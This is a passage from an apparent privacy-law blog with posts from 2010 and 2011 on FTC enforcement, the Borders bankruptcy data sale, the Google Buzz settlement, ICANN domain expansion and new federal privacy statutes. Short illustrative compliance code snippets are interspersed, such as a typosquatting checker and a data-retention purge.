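As a rough illustration of the misspelling concern, the sketch below flags candidate domain labels that sit within a small edit distance of a protected brand name. The brand list, threshold, and example domain are hypothetical; this is not a technique the FTC letter prescribes, only one way such lookalike registrations could be screened.

```typescript
// Hypothetical typosquatting check: flag registrations whose label is within
// edit distance 2 of a protected brand (e.g. "examp1ebank.restaurant").
function editDistance(a: string, b: string): number {
  const dp = Array.from({ length: a.length + 1 }, (_, i) =>
    Array.from({ length: b.length + 1 }, (_, j) => (i === 0 ? j : j === 0 ? i : 0))
  );
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      dp[i][j] = Math.min(
        dp[i - 1][j] + 1,                                     // deletion
        dp[i][j - 1] + 1,                                     // insertion
        dp[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1)    // substitution
      );
    }
  }
  return dp[a.length][b.length];
}

const PROTECTED_BRANDS = ["examplebank", "exampleshop"]; // hypothetical brands

function looksLikeTyposquat(domain: string): boolean {
  const label = domain.split(".")[0].toLowerCase();       // second-level label
  return PROTECTED_BRANDS.some(
    (brand) => label !== brand && editDistance(label, brand) <= 2
  );
}

// looksLikeTyposquat("examp1ebank.restaurant") => true
```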

The FTC received support from the 400-member Association of National Advertisers, which hoped that the letter would help "convince ICANN that it must stop [the] initiative and build true consensus with the many constituencies that depend upon a responsibly managed Internet domain naming process."

The House Energy and Commerce Committee has also expressed opposition to ICANN's expansion plan.  The House Subcommittee on Communications and Technology held a recent hearing to examine the issue, and the full Committee followed up with a bipartisan letter describing domain name expansion as a "worthy goal", while expressing concern "that there is significant uncertainty in this process for business, non-profit organizations, and consumers."  The letter urges ICANN to delay its plan, which is set to go live on January 12, 2012.

September 29, 2011

Borders’s Sale of Personal Information Approved by Bankruptcy Court

The Wall Street Journal reported this week that Judge Martin Glenn of the U.S. Bankruptcy Court in Manhattan approved on September 26 the $13.9 million sale of Borders’s intellectual property to Barnes & Noble. The intellectual property assets include personal information (PI) that Borders collected from 48 million customers, including customers’ email addresses as well as records of the books and videos they purchased.

The issue of the privacy rights of Borders’ customers was debated during the process. At a September 22 hearing, Judge Glenn had hesitated to approve the sale over concerns about customers’ privacy. The two sides, working with the Consumer Privacy Ombudsman (CPO) appointed by the court overseeing the Borders bankruptcy, agreed to email Borders’ customers within a day of the sale's closing to ask whether they wish to opt out of Barnes & Noble’s email list. Records about specific titles bought in the past at Borders won't be included in the sale.

The CPO had contacted the Federal Trade Commission (FTC), requesting that it provide a written description of its concerns regarding the possible sale of the PI collected by Borders during the bankruptcy proceeding.

Bureau of Consumer Protection Director David Vladeck answered in a letter to the CPO on September 14, which was submitted to the court.

Borders and Its Privacy Policies

Selling PI during bankruptcy is regulated by section 363(b) of the Bankruptcy Code, 11 U.S.C. § 363(b), which provides that:  (our emphasis)

(b) (1) The trustee, after notice and a hearing, may use, sell, or lease, other than in the ordinary course of business, property of the estate, except that if the debtor in connection with offering a product or a service discloses to an individual a policy prohibiting the transfer of personally identifiable information about individuals to persons that are not affiliated with the debtor and if such policy is in effect on the date of the commencement of the case, then the trustee may not sell or lease personally identifiable information to any person unless —

(A) such sale or such lease is consistent with such policy; or

(B) after appointment of a consumer privacy ombudsman in accordance with section 332, and after notice and a hearing, the court approves such sale or such lease —

(i) giving due consideration to the facts, circumstances, and conditions of such sale or such lease; and

(ii) finding that no showing was made that such sale or such lease would violate applicable nonbankruptcy law.

Borders’ 2006 and 2007 privacy policies had promised customers that the retailer would only disclose a customer’s email address or other PI to third parties if the customer “expressly consents to such disclosure.” The 2008 privacy policy, however, stated that:

“Circumstances may arise where for strategic or other business reasons, Borders decides to sell, buy, merge or otherwise reorganize its own or other businesses. Such a transaction may involve the disclosure of personal or other information to prospective or actual purchasers, or receiving it from sellers. It is Borders’ practice to seek appropriate protection for information in these types of transactions. In the event that Borders or all of its assets are acquired in such a transaction, customer information would be one of the transferred assets.”

However, Mr. Vladeck wrote that the FTC “views this provision as applying to business transactions that would allow Borders to continue operating as a going concern and not to the dissolution of the company and piecemeal sale of assets in bankruptcy” and that “[e]ven if the provision were to apply in the event of a sale or divestiture of assets through bankruptcy, Borders represented that it would “seek appropriate protection” for such information.”

Privacy Policies and Unfair Practice

Mr. Vladeck wrote that the FTC was concerned that any sale or transfer of the PI of Borders’ customers “would contravene Borders’ express promise not to disclose such information and could constitute a deceptive or unfair practice.”

Mr. Vladeck’s letter noted that the FTC has brought cases in the past alleging that the failure to adhere to a privacy policy is a deceptive practice under the FTC Act. In one of these cases, FTC v. Toysmart, an online retailer had filed for bankruptcy and then tried to sell its customers’ PI. The FTC alleged that the sharing of PI in connection with an offer for sale violated Section 5 of the FTC Act, as the retailer had represented in its privacy policy that such information would never be shared with third parties.

Mr. Vladeck wrote that the “Toysmart settlement is an appropriate model to apply” in the Borders case. The FTC entered into a settlement with Toysmart allowing the transfer of customer information under certain limited circumstances:

1) the buyer had to agree not to sell customer information as a standalone asset, but instead to sell it as part of a larger group of assets, including trademarks and online content;

2) the buyer had to be an entity that concentrated its business in the family commerce market, involving the areas of education, toys, learning, home and/or instruction;

3) the buyer had to agree to treat the personal information in accordance with the terms of Toysmart’s privacy policy; and

4) the buyer had to agree to seek affirmative consent before making any changes to the policy that affected information gathered under the Toysmart policy.

Mr. Vladeck concluded his letter by offering these guidelines:

- Borders agrees not to sell the customer information as a standalone asset;

- The buyer is engaged in substantially the same lines of business as Borders;

- The buyer expressly agrees to be bound by and adhere to the terms of Borders’ privacy policy; and

- The buyer agrees to obtain affirmative consent from consumers for any material changes to the policy that affect information collected under the Borders policy.

It seems that Mr. Vladeck’s letter had a significant impact on the ruling.  Curiously, only a small percentage of customers understand the value their PI may have for a company, even though PI may be sold as an asset.

August 2, 2011

FTC Withdraws FCRA Commentary

Recently, the FTC withdrew its Statement of General Policy or Interpretations under the Fair Credit Reporting Act ("FCRA"), including the FTC's Commentary on the FCRA (the "Commentary"), the day before the authority to enforce and administer the FCRA transferred to the new Consumer Financial Protection Bureau (“CFPB”).

The FTC also released a staff report entitled "Forty Years of Experience with the Fair Credit Reporting Act."  This report provides background on the FTC's role in enforcing the FCRA, and includes a section-by-section summary of the agency’s interpretations of the FCRA. 

In announcing the withdrawal of the Commentary and release of the staff report, the FTC stated that the Commentary "has become partially obsolete since it was issued 21 years ago."  The new staff report deletes several interpretations in the Commentary that have since been repealed, modified or otherwise amended, and adds updated interpretations to reflect changes in the law since the Commentary was released in 1990.  The FTC stated that, given the Commentary's staleness, it "does not believe it is appropriate to transfer the Commentary."


May 31, 2011

FTC Seeks Comments on "Dot Com Disclosures" Guide

The FTC has announced that it is seeking input from businesses on its guidance document regarding online advertising, "Dot Com Disclosures: Information About Online Advertising." 

The guide was originally published in 2000, and given the changing landscape of the online world, the FTC is seeking comment on how the guide should be modified to reflect changes such as the use of mobile marketing, social media, and apps.  The Commission is interested in both the technical and legal issues that marketers, consumer advocates, and others want addressed.

The FTC will take comments until July 11, 2011.  Electronic comments can be submitted here.  Paper comments can be mailed or delivered to:  Federal Trade Commission, Office of the Secretary, Room H-113 (Annex I), 600 Pennsylvania Avenue, N.W., Washington, DC 20580.

May 4, 2011

FTC Settlements Demonstrate Need to Protect Employees’ Sensitive Information

Two recent settlements with companies that the FTC alleged failed to protect employees’ and business customers’ sensitive information highlight the FTC’s ongoing efforts to ensure that entities reasonably and appropriately protect sensitive information. According to the FTC, the entities involved in the recent settlement agreements claimed that they could provide other businesses with methods to protect and secure employees’ sensitive information.

For example, one of the entities, Ceridian Corporation, claimed that its security programs provided “Worry-free Safety and Reliability” and were designed in accordance with industry standards and best practices as well as federal, state, and local requirements. Despite these promises, however, the FTC alleged that Ceridian did not adequately protect information from reasonably foreseeable attacks and stored personal information in an unsecured, unencrypted manner without a legitimate business need. According to the FTC, these lapses led to a security breach that compromised the personal information of approximately 28,000 employees of Ceridian’s business customers.

The other entity, Lookout Services, Inc., claimed that its security systems would keep data “reasonably secure from unauthorized access,” but did not take adequate measures to provide the promised security. The FTC’s complaint alleged that Lookout failed to require strong user passwords, failed to require periodic changes of those passwords, and failed to provide adequate employee training. Lookout experienced a data breach affecting the sensitive data, including Social Security numbers, of approximately 37,000 consumers.

The settlements require the companies to enact comprehensive information security programs and to obtain independent audits of the programs every other year for 20 years.

March 30, 2011

59th Antitrust Law Spring Meeting: Zeroing in on Behavioral Targeting

The ABA Antitrust Section spring meeting began March 30, 2011, and features a number of programs focusing on privacy and data security issues. In the “Zeroing in on Behavioral Targeting” program, panelists from the Federal Trade Commission (“FTC”), the Washington state attorney general’s office, and law firm privacy experts discussed current issues and legal actions involving online behavioral targeting.

Panelists included Becky Burr of WilmerHale; Tina Kondo, Deputy Attorney General with the Washington State Office of the Attorney General; Maneesha Mithal, Associate Director of the FTC’s Division of Privacy and Identity Protection; and David Parisi with Parisi & Havens, LLP.


Google Agrees to Settle FTC Charges and Will Implement a “Comprehensive Privacy Program”

The Federal Trade Commission (“FTC”) announced today that Google has agreed to settle FTC charges that it used deceptive tactics and violated its privacy promises when it launched Google Buzz in 2010. Google will have to implement a “comprehensive privacy program,” as laid out in the proposed consent order. The agreement is subject to public comment through May 1, 2011, after which the FTC will decide whether to make the proposed consent order final.

The proposed consent order refers to both the FTC Act and to the US-EU Safe Harbor Framework, a reference that is likely to be well appreciated in the European Union.

Agreement containing consent order available here.

Complaint available here.

The 2010 complaint

In February 2010, Google launched a social network within Gmail, Google Buzz (“Buzz”). Gmail users were sometimes set up with followers automatically, and without prior notice (Complaint at 7). These followers were the persons they emailed and chatted with most often in Gmail (Complaint at 8). Even if Gmail users chose to opt out of Buzz, they could nevertheless be followed by other Buzz users, and their public profile, if they had created one, would then appear on their followers’ public Google profiles (Complaint at 8-9).

The FTC complaint alleged that Google had violated the FTC Act, when it represented to consumers signing up for a Gmail account that Google would only use their information to provide them this webmail service, whereas Google also used this information to sign them up to Buzz automatically and without their consent. Also, Google represented that consumers would be able to control whether their information would be made public or not.

The complaint also alleged that Google did not adhere to the Safe Harbor Framework privacy principles of Notice and Choice, as Google did not give notice to users before using their personal information for a purpose different from the one for which the data was originally collected. Nor were Gmail users given a choice when Google used their information for a purpose incompatible with the purpose for which it was originally collected (Complaint at 25).

The complaint alleged that Google did not communicate “adequately” that “certain previously private information would be shared publicly by default,” and that the controls allowing users to change the defaults were “confusing and difficult to find” (Complaint at 9). Certain personal information was also shared without Gmail users’ permission (Complaint at 10). For instance, individuals blocked by a Gmail user were not blocked in Buzz and could thus be a follower on Buzz (Complaint at 10).  Even more puzzling, it was not possible to block a follower who did not have a public Google profile, and the Gmail user could not even learn this follower’s real identity (Complaint at 10).  Buzz also offered an @reply function that sometimes caused contacts’ private email addresses to be exposed to all of a user’s followers, and thus to become discoverable by search engines.

Google made some changes following widespread criticism and thousands of customer complaints. Users were given the ability to disable Buzz. Followers were no longer added automatically based on Gmail contacts, but merely suggested. Users could also block any follower, and Buzz users were given the option not to show their followers’ list on their public profile. The @reply function would no longer make private addresses public.

The FTC nevertheless issued a complaint in 2010, and Google has now agreed to settle.

A comprehensive privacy program

The Buzz settlement is particularly interesting as it is the first time that an FTC settlement order requires a company to implement a comprehensive privacy program to protect the privacy of consumer data.

Indeed, the proposed consent order requires Google to implement a “comprehensive privacy program,” documented in writing, which must “(1) address privacy risks related to the development and management of new and existing products and services for consumers, and (2) protect the privacy and confidentiality of covered information” (proposed consent order p. 4). The program must designate the employees responsible for it. It must identify the reasonably foreseeable risks, external and internal, of Google collecting, using, or disclosing personal information without authorization, and put safeguards in place to address those risks. It must also design and implement reasonable privacy controls and procedures and regularly monitor their effectiveness. The program must further cover the selection of service providers capable of protecting the privacy of personal information, with contracts requiring them to do so. The comprehensive privacy program must be evaluated and adjusted as necessary in light of its results (proposed consent order p. 4-5).
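To make the order's requirements concrete, the elements can be read as a checklist. The short Python sketch below is purely illustrative (the class and field names are ours, not the order's) and simply models the components the order enumerates: responsible employees, identified risks, safeguards, service-provider contracts, and ongoing monitoring.

from dataclasses import dataclass, field

@dataclass
class PrivacyProgram:
    """Illustrative checklist of the program elements described in the proposed consent order."""
    responsible_employees: list[str] = field(default_factory=list)   # who owns the program
    identified_risks: list[str] = field(default_factory=list)        # internal and external risks
    safeguards: dict[str, str] = field(default_factory=dict)         # risk -> control in place
    service_provider_contracts: list[str] = field(default_factory=list)
    last_effectiveness_review: str | None = None                     # date of last monitoring cycle

    def gaps(self) -> list[str]:
        """Return the program elements that are still missing."""
        missing = []
        if not self.responsible_employees:
            missing.append("designate responsible employees")
        if not self.identified_risks:
            missing.append("identify reasonably foreseeable risks")
        unmitigated = [r for r in self.identified_risks if r not in self.safeguards]
        if unmitigated:
            missing.append("add safeguards for: " + ", ".join(unmitigated))
        if not self.service_provider_contracts:
            missing.append("contract with service providers on privacy")
        if self.last_effectiveness_review is None:
            missing.append("monitor control effectiveness")
        return missing

A compliance team could instantiate the class for each product line and review the gaps() output at each assessment cycle; again, this is a sketch of the idea, not the order's own framework.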

Also, Google will have to obtain from a qualified third-party professional an initial assessment, and then biennial assessments and reports, setting forth the specific privacy controls implemented by Google, explaining why such controls are appropriate, and explaining how they have been implemented. The third-party professional will also certify that such controls are effective (proposed consent order p. 5-6).

It will be interesting to see whether U.S. companies will start to use the comprehensive privacy program framework as a reference for their own privacy programs, and whether EU Data Protection Authorities will require U.S. organizations that have self-certified to the U.S.-EU Safe Harbor Framework to implement such a privacy program in order to be deemed compliant.

 

March 22, 2011

Inside the Session: Chris Wolf on Behavioral Advertising at the 59th Antitrust Law Spring Meeting

 

Editor’s Note:  “Inside the Session” is a sneak preview of the privacy and information security-related sessions that will take place at  the 59th Antitrust Law Spring Meeting.  For more information on the conference, visit the ABA’s page on the event.

 

It’s no secret that, over the past several years, companies have embraced behavioral targeting to deliver personalized online advertising.  Nor is it any secret that legislators and regulators have been paying close attention to this topic.  The Secure Times recently spoke with Christopher Wolf, who will serve as moderator of the Spring Meeting session entitled “Zeroing in on Behavioral Targeting.”  Chris is a partner in the Washington, D.C. office of Hogan Lovells who practices in the field of privacy and data security law.  He is also the founder and co-chair of the Future of Privacy Forum, a think tank examining behavioral advertising issues.  He gave us a sneak preview of what to expect from the session on Wednesday, March 30, from 3:45-5:15pm.

 

Continue reading "Inside the Session: Chris Wolf on Behavioral Advertising at the 59th Antitrust Law Spring Meeting" »

March 14, 2011

FTC Settles With Chitika Ad Network Over Deceptive Opt-Out Mechanism

The Federal Trade Commission announced a proposed settlement today with Chitika, Inc., the operator of an online advertising network, ending Chitika’s allegedly deceptive practices related to the mechanism it provided allowing users to opt out of its online tracking. Chitika offers an online behavioral advertising service which places targeted ads on a publisher’s website and, according to its website, it has over 100,000 websites in its network, including salary.com and yellowbook.com.

Continue reading "FTC Settles With Chitika Ad Network Over Deceptive Opt-Out Mechanism" »

March 10, 2011

FTC publishes Top 10 Consumer Complaints of 2010. Identity Theft is Still Top Category

The Federal Trade Commission yesterday released a report on the Top 10 Consumer Complaints of 2010. The FTC received 1,339,265 complaints in 2010.

Identity theft was the number one category of complaint for the 11th year in a row. 250,854 complaints, that is, 19 percent, were related to identity theft. The most common form of reported identity theft was government documents/benefits fraud (19%), followed by credit card fraud (15%), phone or utilities fraud (14%), and employment fraud (11%). Victims also reported identity theft by bank fraud (10%) and loan fraud (4%).
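As a quick arithmetic check using only the figures in the FTC's release, the identity theft share works out as reported:

total_complaints = 1_339_265   # all complaints received by the FTC in 2010
identity_theft = 250_854       # identity theft complaints

share = identity_theft / total_complaints
print(f"Identity theft share: {share:.1%}")   # about 18.7%, reported as 19 percent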

Press release available here.

February 23, 2011

FTC Requests Court Shut Down Text Message Spammer

Yesterday, the FTC filed a complaint in the U.S. District Court for the Central District of California requesting a permanent injunction against Philip Flora, alleging violations of §5 of the FTC Act and the CAN-SPAM Act.

According to the complaint, the defendant sent millions of text messages, selling loan modification assistance, debt relief, and other services.  In a single 40-day period, the defendant sent more than 5.5 million spam text messages.  The text messages instructed consumers to reply to the message or to visit one of the defendant's websites.  The defendant collected information from consumers who responded, then sold their contact information to marketers as debt settlement leads.  The FTC alleged that consumers were harmed as a result of the defendant's spam text messages because many must pay fees to their mobile carriers to receive the unwanted messages.

The Commission charged that the defendant violated the FTC Act by sending unsolicited text messages to consumers and misrepresenting that he was affiliated with a government agency.  The Commission also charged the defendant with violating the CAN-SPAM Act by sending emails that advertised his text-message blast service but failed to include an opt-out mechanism and the sender's physical mailing address.
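The two CAN-SPAM elements cited in the complaint (an opt-out mechanism and the sender's physical mailing address) lend themselves to a simple automated screen. The Python sketch below is a toy heuristic of our own, not the statutory test, but it illustrates the kind of check a sender could run before a mailing:

def flags_for_commercial_email(body: str) -> list[str]:
    """Toy screen for two elements cited in the complaint: an opt-out mechanism
    and the sender's physical mailing address. Keyword matching is a rough
    heuristic for illustration only, not a legal test."""
    issues = []
    lowered = body.lower()
    if not any(k in lowered for k in ("unsubscribe", "opt out", "opt-out")):
        issues.append("no opt-out mechanism described")
    if not any(k in lowered for k in ("p.o. box", "street", "suite", "blvd")):
        issues.append("no physical mailing address found")
    return issues

# Example: an ad with neither element would raise both flags.
print(flags_for_commercial_email("Blast 100,000 texts for $500! Reply now."))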

In its press release, the FTC also acknowledged the "invaluable assistance" it received from Verizon Wireless, AT&T, and CTIA - The Wireless Association.

January 26, 2011

House Judiciary Committee Debates Mandatory Data Retention Requirements

On January 25, 2011, the Subcommittee on Crime, Terrorism, and Homeland Security (“Crime Subcommittee”) of the United States House of Representatives Committee on the Judiciary held a hearing regarding the data retention policies of Internet service providers (“ISPs”) and web hosting companies, such as social-networking sites. According to a representative from the Department of Justice, who testified at the hearing, ISPs’ disparate data retention policies hamper criminal investigations and other law enforcement and prosecutorial initiatives. The Department of Justice has recommended that Congress create mandatory data retention requirements to help facilitate law enforcement and prosecutorial activities. No specific legislation was proposed during the Crime Subcommittee hearing; rather, legislators and agency and industry representatives explored the need for data retention requirements.

Privacy advocates have questioned the implications of mandatory data retention requirements that would require entities to maintain sensitive consumer data, such as personally identifiable Internet address information, email and instant-messaging correspondence, and the Web pages users visit. For example, past data retention legislation would have required certain Internet companies to maintain Internet protocol addresses for two years. These data retention proposals conflict with recent agency privacy-protection suggestions advocating the storage of less consumer data, such as the Federal Trade Commission’s proposed privacy framework, which suggests that businesses should “retain[] consumer data for only as long as they have a specific and legitimate business need to do so.”
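The FTC's retention principle can be illustrated with a simple purge routine. The sketch below is hypothetical (the 180-day window and the record fields are assumptions for the example, not anything proposed at the hearing) and shows the basic idea of discarding data once the stated business need has lapsed:

from datetime import datetime, timedelta

RETENTION = timedelta(days=180)   # hypothetical business-need window

def purge_expired(records: list[dict], now: datetime) -> list[dict]:
    """Keep only records still within the retention window.
    `records` is a hypothetical list of dicts with a 'collected_at' datetime."""
    return [r for r in records if now - r["collected_at"] <= RETENTION]

records = [
    {"user": "a", "collected_at": datetime(2010, 1, 5)},
    {"user": "b", "collected_at": datetime(2010, 12, 1)},
]
print(purge_expired(records, now=datetime(2011, 1, 25)))   # only the recent record survives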

More information regarding the Crime Subcommittee’s hearing is available here.

January 21, 2011

FTC Extends Deadline for Comments on Privacy Report to Feb. 18

The FTC announced today that it extended the deadline to comment on its preliminary staff report, "Protecting Consumer Privacy in an Era of Rapid Change: A Proposed Framework for Businesses and Policymakers," until February 18.  Several organizations had requested this extension due to the size and complexity of the report.

To file comments electronically, click here.

January 5, 2011

Lame Duck Privacy Bills

In the last two weeks of 2010, President Obama signed the following three acts addressing privacy:

 

Red Flag Program Clarification Act of 2010

 

President Obama signed the “Red Flag Program Clarification Act of 2010,” S. 2987, (“Clarification Act”) on December 18, 2010, which became Public Law No: 111-319.  The Clarification Act narrows the definition of “creditor” under the Fair Credit Reporting Act (FCRA) by adding a definition to Section 615(e), 15 U.S.C. § 1681m(e), to address issues with the breadth of the Federal Trade Commission’s Identity Theft Red Flags Rule (“Red Flags Rule”).

 

The FTC’s Red Flags Rule was promulgated pursuant to the Fair and Accurate Credit Transactions Act, under which the FTC and other agencies were directed to draft regulations requiring “creditors” and “financial institutions” with “covered accounts” to implement written identity theft prevention programs to identify, detect, and respond to patterns, practices, or specific activities—the so-called “red flags”—that could indicate identity theft.   The FTC interpreted the definition of “creditor” to include entities that regularly permit deferred payment for goods and services, which included lawyers, doctors, and other service providers not typically considered to be “creditors.”  This interpretation led to lawsuits by professional organizations, including the American Bar Association, the American Medical Association, and the American Institute of Certified Public Accountants, challenging the FTC’s position that the Red Flags Rule should apply to their members.

 

The Clarification Act limits the definition of creditor to entities that regularly and in the ordinary course of business: (i) obtain or use consumer credit reports, (ii) furnish information to consumer reporting agencies, or (iii) advance funds to or on behalf of a person.  The definition of creditor specifically excludes creditors that “advance funds on behalf of a person for expenses incidental to a service provided by the creditor to that person.”  However, the Clarification Act also allows the definition of creditor to be expanded by rules promulgated by the FTC or other regulating agencies to include creditors which offer or maintain accounts determined to be subject to a reasonably foreseeable risk of identity theft.
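The Clarification Act's three-prong definition, together with the incidental-expenses carve-out, reduces to straightforward boolean logic. The sketch below is a simplification of our own (it ignores the "regularly and in the ordinary course of business" qualifier and any later agency rulemaking) but captures the basic test:

def is_creditor(uses_credit_reports: bool,
                furnishes_to_reporting_agencies: bool,
                advances_funds: bool,
                advances_only_for_incidental_expenses: bool = False) -> bool:
    """Simplified sketch of the Clarification Act's definition of 'creditor'.
    Statutory nuance is deliberately collapsed into booleans for illustration."""
    if advances_funds and advances_only_for_incidental_expenses:
        advances_funds = False   # carve-out for expenses incidental to a service
    return uses_credit_reports or furnishes_to_reporting_agencies or advances_funds

# A firm that advances only incidental expenses (e.g., filing fees) falls outside the definition.
print(is_creditor(False, False, True, advances_only_for_incidental_expenses=True))  # False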

 

S. 2987 was introduced by Senator John Thune (R-S.D.) and co-sponsored by Senator Mark Begich (D-Alaska) on November 30, 2010, and the Senate unanimously approved the bill the same day.  An identical companion bill, H.R. 6420, was introduced in the House by Representatives John Adler (D-N.J.), Paul Broun (R-Georgia), and Michael Simpson (R-Idaho) on November 17, 2010.  S. 2987 passed the House on December 7, 2010.

 

The FTC had previously delayed enforcement of the Red Flags Rule several times, most recently in May 2010 when it delayed enforcement through December 31, 2010.  The FTC’s Red Flags Rule website, http://www.ftc.gov/redflagsrule, notes that the FTC will be revising its Red Flags guidance to reflect the Clarification Act changes.

 

Social Security Number Protection Act of 2010

 

President Obama also signed the “Social Security Number Protection Act of 2010,” S. 3789, on December 18, 2010, which became Public Law No: 111-318.  S. 3789 was introduced by Senator Dianne Feinstein (D-Calif.) and co-sponsored with bipartisan support, including by Senator Judd Gregg (R-N.H.).  The Act aims to reduce identity theft by limiting access to Social Security numbers, according to a statement from Senator Feinstein.

 

The Act prohibits any federal, state, or local agency from displaying Social Security numbers, or any derivatives of such numbers, on government checks issued after December 18, 2013.  The Act also prohibits any federal, state, or local agency from employing prisoners in jobs that would allow access to Social Security numbers after December 18, 2011.

 

S. 3789 unanimously passed in the Senate on September 28, 2010, and passed in the House by voice vote under suspension of its rules on December 8, 2010.

 

Truth in Caller ID Act of 2009

On December 22, 2010, President Obama signed into law the “Truth in Caller ID Act,” S. 30, which became Public Law No: 111-331.  The Caller ID Act is intended to combat the problem of caller ID “spoofing,” where identity thieves alter the name and number appearing as caller ID information in an attempt to trick people into revealing personal information over the phone.

 

The Caller ID Act amended Section 227 of the Communications Act of 1934, 47 U.S.C. § 227, to make it illegal to knowingly transmit misleading or inaccurate caller identification information with the intent to defraud or cause harm.  However, the Caller ID Act specifically provides that nothing in it may be construed as preventing or restricting any person from using caller ID blocking.

 

The Federal Communications Commission (“FCC”) is required to prescribe regulations to implement the Act within six months.  The Caller ID Act specifically exempts law enforcement activity and caller ID manipulation authorized by court order, and it also allows the FCC to define other exemptions by regulation.  

 

The FCC can impose civil forfeiture penalties of up to $10,000 per violation, or $30,000 for each day of continuing violation, up to a cap of $1,000,000 for any single act or failure to act.  Willful and knowing violations of the Caller ID Act can result in criminal penalties including the same monetary penalties and up to a year in prison.
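For a sense of how those amounts interact, here is a rough, purely illustrative calculation using the figures described above; the statute and the FCC's implementing rules, not this sketch, control how penalties are actually assessed:

PER_VIOLATION = 10_000
PER_DAY_CONTINUING = 30_000
CAP_PER_ACT = 1_000_000

def civil_forfeiture(discrete_violations: int = 0, continuing_days: int = 0) -> int:
    """Rough illustration of how the described amounts could combine for a
    single act or failure to act, subject to the $1,000,000 cap."""
    exposure = discrete_violations * PER_VIOLATION + continuing_days * PER_DAY_CONTINUING
    return min(exposure, CAP_PER_ACT)

print(civil_forfeiture(continuing_days=40))   # 40 days x $30,000 = $1.2M, capped at $1,000,000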

 

S. 30 was introduced by Senator Bill Nelson (D-Fla.) on January 7, 2009, and passed in the Senate on February 23, 2010.  The bill was approved in the House on December 15, 2010 by voice vote under suspension of its rules.  S. 30 was very similar to H.R. 1258, introduced by Representatives Eliot Engel (D-N.Y.) and Joe Barton (R-Tex.) and passed by the House on April 14, 2010, according to a statement released by Representative Engel.

December 15, 2010

Connecticut Attorney General Initiates Investigation of Google's Street View

On December 10, 2010, Connecticut Attorney General Richard Blumenthal announced that his office is investigating whether Google violated state law by collecting data from unsecured wireless networks through its Street View cars. The Civil Investigative Demand, issued on December 10, 2010, requires Google to provide information regarding the type of data that was collected. Last May, Google acknowledged that it had inadvertently collected data from unprotected wireless networks in 30 countries. According to the Connecticut Attorney General’s press release, “Google initially claimed that the data was fragmented, but has since acknowledged that entire e-mails and other information may have been improperly captured.” In light of this disclosure, Connecticut initiated its investigation to verify the kind of data gathered and determine if it contains e-mails, passwords, web-browsing activity, and other private information. The Federal Trade Commission (“FTC”) previously investigated Google’s Street View incident and issued a letter closing the investigation in October 2010. More information about the FTC’s investigation is available here.

December 10, 2010

FTC Seeks Comments on Caller ID Provisions of Telemarketing Sales Rule

On December 7, the FTC announced that it was seeking comments on ways to strengthen the Telemarketing Sales Rule's requirements related to the use of Caller ID.  Currently, the Rule allows consumers to screen out unwanted telemarketing calls by requiring telemarketers to provide Caller ID information.  The FTC is seeking comments on how to address technologies that hide callers' identities.  Comments are due by Jan. 28, 2011.

Continue reading "FTC Seeks Comments on Caller ID Provisions of Telemarketing Sales Rule" »

December 7, 2010

Announcing Program on the FTC's New Privacy Report

Please join us Tuesday, December 14th from 12noon-1:30pm for a telephonic program:  The FTC's New Privacy Report:  What You Need to Know.  The featured speaker will be Jessica Rich, Deputy Director of the FTC's Bureau of Consumer Protection.  She will provide background on the report, highlight its key proposals, and discuss the process going forward, including the opportunity to submit public comments in response to the proposed framework.  The session, which will include a Q&A opportunity, will be moderated by two distinguished privacy scholars, Fred Cate of Indiana University School of Law and Jeffrey Rosen of The George Washington University Law School.  Don't miss this chance to hear directly from the FTC about the report!

The program is sponsored by the ABA Antitrust Section's Privacy and Information Security, Civil Enforcement, Consumer Protection and Private Advertising Litigation Committees. 

To register, click here.

December 1, 2010

"Do Not Track" - House Committee Hearings - Dec. 2

The House Commerce Committee's hearing on the FTC's proposed "Do Not Track" registry is scheduled for tomorrow, December 2nd. Details, along with a witness list, are on the House Commerce Committee's website.
According to the announcement, the hearing "will examine the feasibility of establishing a mechanism that provides Internet users a simple and universal method to opt-out from having their online activity tracked by data-gathering firms."  It is not clear whether tomorrow’s hearing will address hybrid online/offline tracking. Apple responded in July to a Congressional letter regarding its GPS-based tracking practices, but it is not on the invited witness list.
The concept of a universal “Do Not Track” list traces back to at least 2007, when an alliance of privacy groups proposed a list to the FTC, modeled after the FTC’s successful “Do Not Call” list (See Wall Street Journal Article).  
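One mechanism that has been floated for such a universal opt-out is a browser-sent request header that sites agree to honor. The sketch below is purely illustrative; the "DNT" header name and the server logic are assumptions for the example, not anything mandated by the FTC's proposal or on the hearing's agenda.

def should_track(request_headers: dict[str, str]) -> bool:
    """Illustrative only: honor a browser-sent 'DNT: 1' header before setting
    tracking cookies. This is one possible opt-out signal, not the FTC's proposal."""
    dnt = request_headers.get("DNT", "").strip()
    return dnt != "1"

print(should_track({"DNT": "1"}))            # False: user has opted out of tracking
print(should_track({"User-Agent": "..."}))   # True: no preference expressed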

November 14, 2010

Congress and President Obama’s Administration Continue to Debate Privacy Regulation

The Obama administration recently announced that it is preparing a report that will be issued by the U.S. Commerce Department regarding Internet privacy regulation. The Commerce Department’s report is intended to outline the Obama administration’s approach to regulating Internet privacy and steps that should be taken to protect consumers’ online privacy. While the report purportedly does not recommend specific legislation, it does indicate that self-regulation is not as robust and effective as the administration believes privacy protection should be and that Internet privacy protection should be strengthened. The Commerce Department’s report is expected to be released in the next few weeks.

This announcement follows the creation by the White House of a National Science and Technology Council Subcommittee on Privacy and Internet Policy, comprised of representatives from federal departments, agencies, and offices, including the Department of Commerce, the Federal Trade Commission (“FTC”), and the Federal Communications Commission (“FCC”). In addition to the Obama Administration’s efforts regarding privacy protection, the FTC has indicated that it will release a comprehensive report by the end of the year regarding the “Exploring Privacy” roundtables that were hosted by the Commission in fall 2009 and early 2010. The report will also contain recommendations for privacy protection and changes to the FTC’s privacy protection framework. Further, Representative Joe Barton (R-TX), currently the ranking minority member of the House of Representatives Committee on Energy and Commerce, has indicated that he intends to support tougher Internet privacy polices when Congress begins its January 2011 session.

October 27, 2010

FTC Steps Down from Google Data Privacy Investigation, U.K. Back On Board

Oct. 27, 2010. The Federal Trade Commission today posted a letter to Google’s counsel announcing that it is ending its inquiry into Google’s collection of information sent over unsecured wireless networks. The inquiry began after Google revealed in May 2010 that its Street View cars had been collecting more than just WiFi location information such as SSID information and MAC addresses. Instead, Google had also been capturing “payload” data sent over unsecured wireless networks. The May announcement came after the data protection authority in Hamburg, Germany, requested an audit of the Street View data.
 
